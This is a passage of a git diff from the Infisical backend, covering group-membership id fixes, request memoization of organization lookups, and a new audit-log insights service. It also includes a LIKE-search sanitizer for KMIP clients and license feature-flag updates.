user.userId, + userId: user.id, groupId: group.id, isPending: false })), @@ -82,7 +82,7 @@ const addAcceptedUsersToGroup = async ({ continue; } - const usersToAddProjectKeyFor = 
users.filter((u) => !userKeysSet.has(`${projectId}-${u.userId}`)); + const usersToAddProjectKeyFor = users.filter((u) => !userKeysSet.has(`${projectId}-${u.id}`)); if (usersToAddProjectKeyFor.length) { // there are users who need to be shared keys @@ -149,7 +149,7 @@ const addAcceptedUsersToGroup = async ({ encryptedKey, nonce, senderId: ghostUser.id, - receiverId: user.userId, + receiverId: user.id, projectId }; }); diff --git a/backend/src/ee/services/group/group-service.ts b/backend/src/ee/services/group/group-service.ts index 3b0a2d7539f..c2017f8cfe3 100644 --- a/backend/src/ee/services/group/group-service.ts +++ b/backend/src/ee/services/group/group-service.ts @@ -6,6 +6,8 @@ import { AccessScope, OrganizationActionScope, OrgMembershipRole, TGroups, TRole import { TOidcConfigDALFactory } from "@app/ee/services/oidc/oidc-config-dal"; import { BadRequestError, NotFoundError, PermissionBoundaryError, UnauthorizedError } from "@app/lib/errors"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TGenericPermission } from "@app/lib/types"; import { TIdentityDALFactory } from "@app/services/identity/identity-dal"; import { TMembershipDALFactory } from "@app/services/membership/membership-dal"; @@ -78,10 +80,7 @@ type TGroupServiceFactoryDep = { projectDAL: Pick; projectBotDAL: Pick; projectKeyDAL: Pick; - permissionService: Pick< - TPermissionServiceFactory, - "getOrgPermission" | "getOrgPermissionByRoles" | "invalidateProjectPermissionCache" - >; + permissionService: Pick; licenseService: Pick; oidcConfigDAL: Pick; }; @@ -125,7 +124,9 @@ export const groupServiceFactory = ({ }); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles([role], actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await 
requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const isCustomRole = Boolean(rolePermissionDetails?.role); if (role !== OrgMembershipRole.NoAccess) { const permissionBoundary = validatePrivilegeChangeOperation( @@ -238,7 +239,9 @@ export const groupServiceFactory = ({ if (role) { const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles([role], actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const isCustomRole = Boolean(rolePermissionDetails?.role); const permissionBoundary = validatePrivilegeChangeOperation( @@ -883,7 +886,9 @@ export const groupServiceFactory = ({ const groupRoles = groupMembership.roles.map((el) => el.customRoleSlug || el.role); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles(groupRoles, actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); // check if user has broader or equal to privileges than group const permissionBoundary = validatePrivilegeChangeOperation( @@ -962,7 +967,9 @@ export const groupServiceFactory = ({ const groupRoles = groupMembership.roles.map((el) => el.customRoleSlug || el.role); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles(groupRoles, actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); // check if user has broader or equal to privileges than group const permissionBoundary = validatePrivilegeChangeOperation( @@ -1053,7 +1060,9 @@ export const 
groupServiceFactory = ({ const groupRoles = groupMembership.roles.map((el) => el.customRoleSlug || el.role); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles(groupRoles, actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); // check if user has broader or equal to privileges than group const permissionBoundary = validatePrivilegeChangeOperation( @@ -1130,7 +1139,9 @@ export const groupServiceFactory = ({ const groupRoles = groupMembership.roles.map((el) => el.customRoleSlug || el.role); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles(groupRoles, actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); // check if user has broader or equal to privileges than group const permissionBoundary = validatePrivilegeChangeOperation( @@ -1166,7 +1177,8 @@ export const groupServiceFactory = ({ identityIds: [identityId], identityDAL, membershipDAL, - identityGroupMembershipDAL + identityGroupMembershipDAL, + membershipGroupDAL }); await cleanUpSubOrgProjectMemberships({ diff --git a/backend/src/ee/services/group/group-types.ts b/backend/src/ee/services/group/group-types.ts index 30ebe121b9b..6c42df5272c 100644 --- a/backend/src/ee/services/group/group-types.ts +++ b/backend/src/ee/services/group/group-types.ts @@ -148,6 +148,7 @@ export type TRemoveIdentitiesFromGroup = { identityDAL: Pick; membershipDAL: Pick; identityGroupMembershipDAL: Pick; + membershipGroupDAL: Pick; }; export type TConvertPendingGroupAdditionsToGroupMemberships = { diff --git a/backend/src/ee/services/insights/insights-service.ts b/backend/src/ee/services/insights/insights-service.ts new 
file mode 100644 index 00000000000..a1071ea1480 --- /dev/null +++ b/backend/src/ee/services/insights/insights-service.ts @@ -0,0 +1,498 @@ +import { ForbiddenError } from "@casl/ability"; + +// import geoip from "geoip-lite"; +import { ActionProjectType, IdentityAuthMethod } from "@app/db/schemas"; +import { TAuditLogDALFactory } from "@app/ee/services/audit-log/audit-log-dal"; +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { TLicenseServiceFactory } from "@app/ee/services/license/license-service"; +import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; +import { ProjectPermissionInsightsActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; +import { TSecretRotationV2DALFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-dal"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; +import { withCache } from "@app/lib/cache/with-cache"; +import { BadRequestError } from "@app/lib/errors"; +import { OrgServiceActor } from "@app/lib/types"; +import { ActorType } from "@app/services/auth/auth-type"; +import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service"; +import { TReminderDALFactory } from "@app/services/reminder/reminder-dal"; +import { TSecretFolderDALFactory } from "@app/services/secret-folder/secret-folder-dal"; +import { TSecretV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-v2-bridge-dal"; +import { TUserDALFactory } from "@app/services/user/user-dal"; + +import { + // TGetAccessLocationsDTO, + TGetAccessVolumeDTO, + TGetAuthMethodDistributionDTO, + TGetInsightsCalendarDTO, + TGetInsightsSummaryDTO +} from "./insights-types"; + +type TInsightsServiceFactoryDep = { + permissionService: Pick; + licenseService: Pick; + auditLogDAL: Pick; + secretRotationV2DAL: Pick; + reminderDAL: Pick; + folderDAL: Pick; + secretV2BridgeDAL: Pick; + 
projectBotService: Pick; + userDAL: Pick; + keyStore: Pick; +}; + +export type TInsightsServiceFactory = ReturnType; + +const VALUE_EVENT_TYPES = [ + EventType.GET_SECRETS, + EventType.GET_SECRET, + EventType.DASHBOARD_GET_SECRET_VALUE, + EventType.DASHBOARD_GET_SECRET_VERSION_VALUE, + EventType.GET_SECRET_ROTATION_GENERATED_CREDENTIALS, + EventType.CREATE_DYNAMIC_SECRET_LEASE +]; + +const checkInsightsPermission = async ( + permissionService: TInsightsServiceFactoryDep["permissionService"], + licenseService: TInsightsServiceFactoryDep["licenseService"], + projectId: string, + actor: OrgServiceActor +) => { + const plan = await licenseService.getPlan(actor.orgId); + if (!plan.secretAccessInsights) { + throw new BadRequestError({ + message: "Failed to access insights due to plan restriction. Upgrade your plan to access insights." + }); + } + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorId: actor.id, + projectId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + actionProjectType: ActionProjectType.SecretManager + }); + + ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionInsightsActions.Read, ProjectPermissionSub.Insights); +}; + +export const insightsServiceFactory = ({ + permissionService, + licenseService, + auditLogDAL, + secretRotationV2DAL, + reminderDAL, + folderDAL, + secretV2BridgeDAL, + projectBotService, + userDAL, + keyStore +}: TInsightsServiceFactoryDep) => { + const fetchReminders = async (projectId: string, startDate: Date, endDate: Date) => { + const rawReminders = await reminderDAL.findByProjectAndDateRange({ projectId, startDate, endDate }); + if (!rawReminders.length) return []; + + const folderIds = [...new Set(rawReminders.map((r) => r.folderId))]; + const foldersWithPath = await folderDAL.findSecretPathByFolderIds(projectId, folderIds); + const folderRecord: Record = {}; + foldersWithPath.forEach((folder) => { + if (folder) folderRecord[folder.id] = 
folder.path; + }); + + return rawReminders.map((r) => ({ + id: r.id, + secretId: r.secretId ?? null, + secretKey: r.secretKey, + nextReminderDate: r.nextReminderDate, + message: r.message ?? null, + environment: r.envSlug, + secretPath: folderRecord[r.folderId] ?? "/", + repeatDays: r.repeatDays ?? null + })); + }; + + const getCalendar = async (dto: TGetInsightsCalendarDTO, actorDto: OrgServiceActor) => { + await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + const cacheKey = KeyStorePrefixes.InsightsCache(dto.projectId, `calendar:${dto.year}-${dto.month}`); + return withCache({ + keyStore, + key: cacheKey, + ttlSeconds: KeyStoreTtls.InsightsCacheInSeconds, + fetcher: async () => { + const { shouldUseSecretV2Bridge } = await projectBotService.getBotKey(dto.projectId); + if (!shouldUseSecretV2Bridge) throw new BadRequestError({ message: "Project version not supported" }); + + // Pad by 1 day on each side so events near month boundaries are captured + // regardless of the caller's timezone offset from UTC. + const startDate = new Date(Date.UTC(dto.year, dto.month - 1, 0)); + const endDate = new Date(Date.UTC(dto.year, dto.month, 1, 23, 59, 59, 999)); + + const [rotations, reminders] = await Promise.all([ + secretRotationV2DAL.findByProjectAndDateRange({ projectId: dto.projectId, startDate, endDate }), + fetchReminders(dto.projectId, startDate, endDate) + ]); + + return { + rotations: rotations.map((r) => ({ + id: r.id, + name: r.name, + type: r.type, + nextRotationAt: r.nextRotationAt ?? 
null, + environment: r.environment.slug, + secretPath: r.folder.path, + secretKeys: r.secretKeys, + rotationInterval: r.rotationInterval, + rotationStatus: r.rotationStatus, + isAutoRotationEnabled: r.isAutoRotationEnabled + })), + reminders + }; + } + }); + }; + + const getAccessVolume = async (dto: TGetAccessVolumeDTO, actorDto: OrgServiceActor) => { + await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + const cacheKey = KeyStorePrefixes.InsightsCache(dto.projectId, "access-volume"); + return withCache({ + keyStore, + key: cacheKey, + ttlSeconds: KeyStoreTtls.InsightsCacheInSeconds, + fetcher: async () => { + const now = new Date(); + const todayStr = now.toISOString().slice(0, 10); + const endDate = new Date(`${todayStr}T23:59:59.999Z`); + const startDate = new Date(`${todayStr}T00:00:00.000Z`); + startDate.setUTCDate(startDate.getUTCDate() - 6); + + const rows = await auditLogDAL.countByDateAndActor({ + orgId: actorDto.orgId, + projectId: dto.projectId, + eventTypes: VALUE_EVENT_TYPES, + startDate: startDate.toISOString(), + endDate: endDate.toISOString() + }); + + // Resolve user display names from userIds in audit log metadata + const userIds = [ + ...new Set( + rows + .filter((r) => r.actor === ActorType.USER) + .map((r) => (r.actorMetadata as Record | null)?.userId) + .filter(Boolean) as string[] + ) + ]; + const userNameMap = new Map(); + if (userIds.length > 0) { + const users = await userDAL.find({ $in: { id: userIds } }); + users.forEach((u) => { + const displayName = [u.firstName, u.lastName].filter(Boolean).join(" "); + if (displayName) userNameMap.set(u.id, displayName); + }); + } + + // Pre-populate the last 7 days + const dayMap = new Map>(); + for (let i = 6; i >= 0; i -= 1) { + const d = new Date(`${todayStr}T00:00:00.000Z`); + d.setUTCDate(d.getUTCDate() - i); + dayMap.set(d.toISOString().slice(0, 10), new Map()); + } + + rows.forEach((row) => { + const dateKey = typeof row.date === "string" ? 
row.date : new Date(row.date).toISOString().slice(0, 10); + const actorMap = dayMap.get(dateKey); + if (!actorMap) return; + + const actorMeta = row.actorMetadata as Record | null; + let actorName: string; + if (row.actor === ActorType.USER && actorMeta?.userId) { + actorName = userNameMap.get(actorMeta.userId) || actorMeta.email || actorMeta.username || "Unknown"; + } else if (row.actor === ActorType.USER) { + actorName = actorMeta?.email || actorMeta?.username || "Unknown"; + } else { + actorName = actorMeta?.name || actorMeta?.identityId || "Unknown"; + } + const actorKey = `${row.actor}:${actorName}`; + + const existing = actorMap.get(actorKey); + if (existing) { + existing.count += row.count; + } else { + actorMap.set(actorKey, { name: actorName, type: row.actor, count: row.count }); + } + }); + + const days = Array.from(dayMap.entries()).map(([date, actorMap]) => { + const actors = Array.from(actorMap.values()).sort((a, b) => b.count - a.count); + const total = actors.reduce((sum, a) => sum + a.count, 0); + return { date, total, actors }; + }); + + return { days }; + } + }); + }; + + // const getAccessLocations = async (dto: TGetAccessLocationsDTO, actorDto: OrgServiceActor) => { + // await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + // const cacheKey = KeyStorePrefixes.InsightsCache(dto.projectId, `access-locations:${dto.days}`); + // return withCache(cacheKey, async () => { + // const endDate = new Date(); + // const startDate = new Date(); + // startDate.setUTCDate(startDate.getUTCDate() - dto.days); + + // const ipRows = await auditLogDAL.countByIpAddress({ + // orgId: actorDto.orgId, + // projectId: dto.projectId, + // eventTypes: VALUE_EVENT_TYPES, + // startDate: startDate.toISOString(), + // endDate: endDate.toISOString() + // }); + + // const locationMap = new Map(); + + // const isPrivateIp = (ip: string) => + // ip === "127.0.0.1" || + // ip === "::1" || + // ip === "::ffff:127.0.0.1" || + // 
ip.startsWith("10.") || + // ip.startsWith("172.16.") || + // ip.startsWith("172.17.") || + // ip.startsWith("172.18.") || + // ip.startsWith("172.19.") || + // ip.startsWith("172.20.") || + // ip.startsWith("172.21.") || + // ip.startsWith("172.22.") || + // ip.startsWith("172.23.") || + // ip.startsWith("172.24.") || + // ip.startsWith("172.25.") || + // ip.startsWith("172.26.") || + // ip.startsWith("172.27.") || + // ip.startsWith("172.28.") || + // ip.startsWith("172.29.") || + // ip.startsWith("172.30.") || + // ip.startsWith("172.31.") || + // ip.startsWith("192.168."); + + // ipRows.forEach(({ ipAddress: ip, count }) => { + // if (isPrivateIp(ip)) { + // const key = "Local Network:LOCAL"; + // const existing = locationMap.get(key); + // if (existing) { + // existing.count += count; + // } else { + // locationMap.set(key, { lat: 0, lng: 0, city: "Local Network", country: "LOCAL", count }); + // } + // return; + // } + + // const geo = geoip.lookup(ip); + // if (!geo || !geo.ll) return; + + // const city = geo.city || geo.region || ""; + // const key = `${city}:${geo.country}`; + // const existing = locationMap.get(key); + // if (existing) { + // existing.count += count; + // } else { + // locationMap.set(key, { + // lat: geo.ll[0], + // lng: geo.ll[1], + // city, + // country: geo.country, + // count + // }); + // } + // }); + + // return { + // locations: Array.from(locationMap.values()).sort((a, b) => b.count - a.count) + // }; + // }); + // }; + + const getAuthMethodDistribution = async (dto: TGetAuthMethodDistributionDTO, actorDto: OrgServiceActor) => { + await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + const cacheKey = KeyStorePrefixes.InsightsCache(dto.projectId, `auth-methods:${dto.days}`); + return withCache({ + keyStore, + key: cacheKey, + ttlSeconds: KeyStoreTtls.InsightsCacheInSeconds, + fetcher: async () => { + const endDate = new Date(); + const startDate = new Date(); + 
startDate.setUTCDate(startDate.getUTCDate() - dto.days); + + const authRows = await auditLogDAL.countByAuthMethod({ + orgId: actorDto.orgId, + projectId: dto.projectId, + eventTypes: VALUE_EVENT_TYPES, + startDate: startDate.toISOString(), + endDate: endDate.toISOString() + }); + + const methodCounts = new Map(); + + const authMethodLabels: Record = { + email: "Email", + google: "Google", + github: "GitHub", + gitlab: "GitLab", + "okta-saml": "Okta SAML", + "azure-saml": "Azure SAML", + "jumpcloud-saml": "JumpCloud SAML", + "google-saml": "Google SAML", + "keycloak-saml": "Keycloak SAML", + ldap: "LDAP", + oidc: "OIDC" + }; + + const identityAuthMethodLabels: Record = { + [IdentityAuthMethod.UNIVERSAL_AUTH]: "Universal Auth", + [IdentityAuthMethod.TOKEN_AUTH]: "Token Auth", + [IdentityAuthMethod.KUBERNETES_AUTH]: "Kubernetes", + [IdentityAuthMethod.GCP_AUTH]: "GCP Auth", + [IdentityAuthMethod.AWS_AUTH]: "AWS Auth", + [IdentityAuthMethod.AZURE_AUTH]: "Azure Auth", + [IdentityAuthMethod.OIDC_AUTH]: "OIDC", + [IdentityAuthMethod.JWT_AUTH]: "JWT Auth", + [IdentityAuthMethod.LDAP_AUTH]: "LDAP Auth", + [IdentityAuthMethod.ALICLOUD_AUTH]: "AliCloud Auth", + [IdentityAuthMethod.TLS_CERT_AUTH]: "TLS Certificate", + [IdentityAuthMethod.OCI_AUTH]: "OCI Auth", + [IdentityAuthMethod.SPIFFE_AUTH]: "SPIFFE Auth" + }; + + authRows.forEach((row) => { + const actorMeta = row.actorMetadata as Record | null; + let method = "Unknown"; + + if (row.actor === "user") { + const raw = (actorMeta?.authMethod as string) || "Unknown"; + method = authMethodLabels[raw] || raw; + } else if (row.actor === "identity") { + const identityAuth = actorMeta?.authMethod as IdentityAuthMethod | undefined; + method = identityAuth ? 
identityAuthMethodLabels[identityAuth] || identityAuth : "Unknown"; + } else if (row.actor === "service") { + method = "Service Token"; + } else { + method = row.actor; + } + + methodCounts.set(method, (methodCounts.get(method) || 0) + (row.count || 0)); + }); + + const methods = Array.from(methodCounts.entries()) + .map(([method, count]) => ({ method, count })) + .sort((a, b) => b.count - a.count); + + return { methods }; + } + }); + }; + + const getSummary = async (dto: TGetInsightsSummaryDTO, actorDto: OrgServiceActor) => { + await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + const cacheKey = KeyStorePrefixes.InsightsCache( + dto.projectId, + `summary:${dto.staleSecretsOffset ?? 0}:${dto.staleSecretsLimit ?? 50}` + ); + return withCache({ + keyStore, + key: cacheKey, + ttlSeconds: KeyStoreTtls.InsightsCacheInSeconds, + fetcher: async () => { + const { shouldUseSecretV2Bridge } = await projectBotService.getBotKey(dto.projectId); + if (!shouldUseSecretV2Bridge) throw new BadRequestError({ message: "Project version not supported" }); + + const now = new Date(); + const in7Days = new Date(now); + in7Days.setDate(now.getDate() + 7); + const lookback90Days = new Date(now); + lookback90Days.setDate(now.getDate() - 90); + const staleThreshold = lookback90Days; + + // Fetch upcoming rotations (by date range) and all failed rotations (no date filter) in parallel + // Use 90-day lookback to capture overdue items without unbounded historical queries + const [upcomingRotationsRaw, allProjectRotations, reminders] = await Promise.all([ + secretRotationV2DAL.findByProjectAndDateRange({ + projectId: dto.projectId, + startDate: lookback90Days, + endDate: in7Days + }), + secretRotationV2DAL.findByProject(dto.projectId), + fetchReminders(dto.projectId, lookback90Days, in7Days) + ]); + + const mapRotation = (r: (typeof allProjectRotations)[number]) => ({ + name: r.name, + environment: r.environment.slug, + secretPath: r.folder.path, + 
nextRotationAt: r.nextRotationAt ?? null, + rotationStatus: r.rotationStatus + }); + + const mapReminder = (r: (typeof reminders)[number]) => ({ + secretKey: r.secretKey, + environment: r.environment, + secretPath: r.secretPath, + nextReminderDate: r.nextReminderDate + }); + + const upcomingRotations = upcomingRotationsRaw.map(mapRotation); + + const failedRotations = allProjectRotations.filter((r) => r.rotationStatus === "failed").map(mapRotation); + const upcomingReminders = reminders.filter((r) => new Date(r.nextReminderDate) >= now).map(mapReminder); + const overdueReminders = reminders.filter((r) => new Date(r.nextReminderDate) < now).map(mapReminder); + + const [rawStaleSecrets, totalStaleCount] = await Promise.all([ + secretV2BridgeDAL.findStaleByProject(dto.projectId, staleThreshold, { + offset: dto.staleSecretsOffset ?? 0, + limit: dto.staleSecretsLimit ?? 50 + }), + secretV2BridgeDAL.countStaleByProject(dto.projectId, staleThreshold) + ]); + + // Resolve folder paths for stale secrets + const staleFolderIds = [...new Set(rawStaleSecrets.map((s) => s.folderId))]; + const staleFolders = staleFolderIds.length + ? await folderDAL.findSecretPathByFolderIds(dto.projectId, staleFolderIds) + : []; + const staleFolderMap: Record = {}; + staleFolders.forEach((f) => { + if (f) staleFolderMap[f.id] = f.path; + }); + + const staleSecrets = rawStaleSecrets.map((s) => ({ + key: s.key, + environment: s.environment, + secretPath: staleFolderMap[s.folderId] ?? 
"/", + updatedAt: s.updatedAt + })); + + return { + upcomingRotations, + failedRotations, + upcomingReminders, + overdueReminders, + staleSecrets, + totalStaleCount + }; + } + }); + }; + + return { + getCalendar, + getAccessVolume, + // getAccessLocations, + getAuthMethodDistribution, + getSummary + }; +}; diff --git a/backend/src/ee/services/insights/insights-types.ts b/backend/src/ee/services/insights/insights-types.ts new file mode 100644 index 00000000000..4705b5c6093 --- /dev/null +++ b/backend/src/ee/services/insights/insights-types.ts @@ -0,0 +1,25 @@ +export type TGetInsightsCalendarDTO = { + projectId: string; + month: number; + year: number; +}; + +export type TGetAccessVolumeDTO = { + projectId: string; +}; + +export type TGetAccessLocationsDTO = { + projectId: string; + days: number; +}; + +export type TGetAuthMethodDistributionDTO = { + projectId: string; + days: number; +}; + +export type TGetInsightsSummaryDTO = { + projectId: string; + staleSecretsOffset?: number; + staleSecretsLimit?: number; +}; diff --git a/backend/src/ee/services/kmip/kmip-client-dal.ts b/backend/src/ee/services/kmip/kmip-client-dal.ts index 2650ebad075..0a15ce7a9a0 100644 --- a/backend/src/ee/services/kmip/kmip-client-dal.ts +++ b/backend/src/ee/services/kmip/kmip-client-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TKmipClients } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; import { OrderByDirection } from "@app/lib/types"; @@ -56,7 +57,7 @@ export const kmipClientDALFactory = (db: TDbClient) => { .where("projectId", projectId) .where((qb) => { if (search) { - void qb.whereILike("name", `%${search}%`); + void qb.whereILike("name", `%${sanitizeSqlLikeString(search)}%`); } }) .select< diff --git a/backend/src/ee/services/kmip/kmip-operation-service.ts 
b/backend/src/ee/services/kmip/kmip-operation-service.ts index 25acdf11ecc..d635c1942bf 100644 --- a/backend/src/ee/services/kmip/kmip-operation-service.ts +++ b/backend/src/ee/services/kmip/kmip-operation-service.ts @@ -6,7 +6,6 @@ import { KmipOperationType, recordKmipOperationMetric } from "@app/lib/telemetry import { TKmsKeyDALFactory } from "@app/services/kms/kms-key-dal"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { KmsKeyUsage } from "@app/services/kms/kms-types"; -import { TProjectDALFactory } from "@app/services/project/project-dal"; import { OrgPermissionKmipActions, OrgPermissionSubjects } from "../permission/org-permission"; import { TPermissionServiceFactory } from "../permission/permission-service-types"; @@ -26,7 +25,6 @@ type TKmipOperationServiceFactoryDep = { kmsService: TKmsServiceFactory; kmsDAL: TKmsKeyDALFactory; kmipClientDAL: TKmipClientDALFactory; - projectDAL: Pick; permissionService: Pick; }; @@ -35,7 +33,6 @@ export type TKmipOperationServiceFactory = ReturnType { @@ -470,8 +467,6 @@ export const kmipOperationServiceFactory = ({ }); } - const project = await projectDAL.findById(projectId); - const kmsKey = await kmsService.importKeyMaterial({ name, key: Buffer.from(key, "base64"), @@ -479,7 +474,7 @@ export const kmipOperationServiceFactory = ({ isReserved: false, projectId, keyUsage: KmsKeyUsage.ENCRYPT_DECRYPT, - orgId: project.orgId, + orgId: actorOrgId, kmipMetadata }); diff --git a/backend/src/ee/services/ldap-config/ldap-config-service.ts b/backend/src/ee/services/ldap-config/ldap-config-service.ts index 7a21480f445..aae3b758f9e 100644 --- a/backend/src/ee/services/ldap-config/ldap-config-service.ts +++ b/backend/src/ee/services/ldap-config/ldap-config-service.ts @@ -14,6 +14,8 @@ import { addUsersToGroupByUserIds, removeUsersFromGroupByUserIds } from "@app/ee import { TUserGroupMembershipDALFactory } from "@app/ee/services/group/user-group-membership-dal"; import { throwOnPlanSeatLimitReached } from 
"@app/ee/services/license/license-fns"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { sanitizeEmail, validateEmail } from "@app/lib/validator/validate-email"; import { TAuthLoginFactory } from "@app/services/auth/auth-login-service"; @@ -149,7 +151,7 @@ export const ldapConfigServiceFactory = ({ "Failed to create LDAP configuration due to plan restriction. Upgrade plan to create LDAP configuration." }); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not find organization with ID "${orgId}"` }); @@ -277,7 +279,7 @@ export const ldapConfigServiceFactory = ({ "Failed to update LDAP configuration due to plan restriction. Upgrade plan to update LDAP configuration." 
}); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not find organization with ID "${orgId}"` }); @@ -415,7 +417,6 @@ export const ldapConfigServiceFactory = ({ }); } - // Verify that the email domain (if verified on the platform) belongs to this org await verifyEmailDomainOwnership({ email, orgId, emailDomainDAL }); const sanitizedEmail = sanitizeEmail(email); validateEmail(sanitizedEmail); @@ -426,7 +427,7 @@ export const ldapConfigServiceFactory = ({ aliasType: UserAliasType.LDAP }); - const organization = await orgDAL.findOrgById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!organization) throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` }); if (userAlias) { @@ -631,7 +632,7 @@ export const ldapConfigServiceFactory = ({ await smtpService.sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${token}`, recipients: [user.email], substitutions: { code: token diff --git a/backend/src/ee/services/license/__mocks__/license-fns.ts b/backend/src/ee/services/license/__mocks__/license-fns.ts index 7ea2ab6c1b1..721672bc32c 100644 --- a/backend/src/ee/services/license/__mocks__/license-fns.ts +++ b/backend/src/ee/services/license/__mocks__/license-fns.ts @@ -36,7 +36,9 @@ export const getDefaultOnPremFeatures = () => { enterpriseAppConnections: true, machineIdentityAuthTemplates: false, pkiLegacyTemplates: false, - emailDomainVerification: true + emailDomainVerification: true, + gatewayPool: false, + fips: true }; }; diff --git a/backend/src/ee/services/license/license-fns.ts b/backend/src/ee/services/license/license-fns.ts index b75ef22b5ee..15e350d2de2 100644 --- a/backend/src/ee/services/license/license-fns.ts 
+++ b/backend/src/ee/services/license/license-fns.ts @@ -105,6 +105,7 @@ export const getDefaultOnPremFeatures = (): TFeatureSet => ({ projectTemplates: false, kmip: false, gateway: false, + gatewayPool: false, sshHostGroups: false, secretScanning: false, enterpriseSecretSyncs: false, diff --git a/backend/src/ee/services/license/license-service.ts b/backend/src/ee/services/license/license-service.ts index c8e311621f6..b8506d41444 100644 --- a/backend/src/ee/services/license/license-service.ts +++ b/backend/src/ee/services/license/license-service.ts @@ -10,11 +10,13 @@ import { CronJob } from "cron"; import { Knex } from "knex"; import { OrganizationActionScope } from "@app/db/schemas"; -import { TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { TEnvConfig } from "@app/lib/config/env"; import { verifyOfflineLicense } from "@app/lib/crypto"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from "@app/services/org/org-dal"; import { TProjectDALFactory } from "@app/services/project/project-dal"; @@ -63,9 +65,6 @@ export type TLicenseServiceFactory = ReturnType; const LICENSE_SERVER_CLOUD_LOGIN = "/api/auth/v1/license-server-login"; const LICENSE_SERVER_ON_PREM_LOGIN = "/api/auth/v1/license-login"; -const LICENSE_SERVER_CLOUD_PLAN_TTL = 5 * 60; // 5 mins -const FEATURE_CACHE_KEY = (orgId: string) => `infisical-cloud-plan-${orgId}`; - export const licenseServiceFactory = ({ orgDAL, permissionService, @@ -201,7 +200,7 @@ export const licenseServiceFactory = ({ logger.info(`getPlan: attempting to fetch plan for [orgId=${orgId}] [projectId=${projectId}]`); try { if (instanceType === InstanceType.Cloud) { - const cachedPlan = await 
